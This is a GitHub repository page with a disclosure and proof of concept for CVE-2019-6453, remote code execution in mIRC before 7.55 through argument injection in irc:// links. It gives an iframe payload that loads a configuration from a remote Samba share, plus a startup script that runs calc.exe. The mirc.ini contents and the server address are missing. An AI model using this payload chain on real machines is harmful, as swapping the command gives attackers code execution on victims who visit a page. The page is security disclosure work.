Skip to content
Proof of calc for CVE-2019-6453
Branch: master
Clone or download
Latest commit 1eeacae Feb 18, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information. Update Feb 18, 2019 Initial commit Feb 18, 2019
rce-poc.gif Initial commit Feb 18, 2019

CVE-2019-6453: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers

[Link to the write-up]

We found a Remote Code Execution vulnerability in mIRC through the irc:// URI protocol handler. Because mIRC doesn't use any kind of sigil such as -- to mark the end of the argument list, an attacker is able to pass arguments to mIRC through a irc:// link and execute arbitrary code by loading a custom mirc.ini from an attacker-controlled Samba file server. Please note that ircs:// works the same way.


The proof of calc requires three files: mirc.ini, calc.ini and poc.html. We assume a Samba file server is running on the attacker's side. For the sake of the example, the following pieces of code assume it is running on host (i.e. replace by your own server's address in the following files to try this out).


mirc.ini is a custom configuration file that should be located at C:\mirc-poc\mirc.ini on the file server.



calc.ini is a remote script file that should be located at C:\mirc-poc\calc.ini on the file server.

n0=on *:START: {
n1=  /run calc.exe


Just visiting poc.html should work assuming mIRC is set as the default handler for the irc:// URI scheme and the browser does not encode the payload. Depending on the browser and your configuration, you might still get a prompt (not the case on Firefox).

<iframe src='irc://? -i\\\C$\mirc-poc\mirc.ini' />

PoC gif

PoC gif

Affected versions

This PoC runs for mIRC <7.55.

You can trigger the PoC on Edge 42.17134 (last preview version) and Firefox 64.0.2 (last release). It doesn't work on Chrome because the way Chrome handle URI protocols (URI is encoded before being passed to the application).


You can’t perform that action at this time.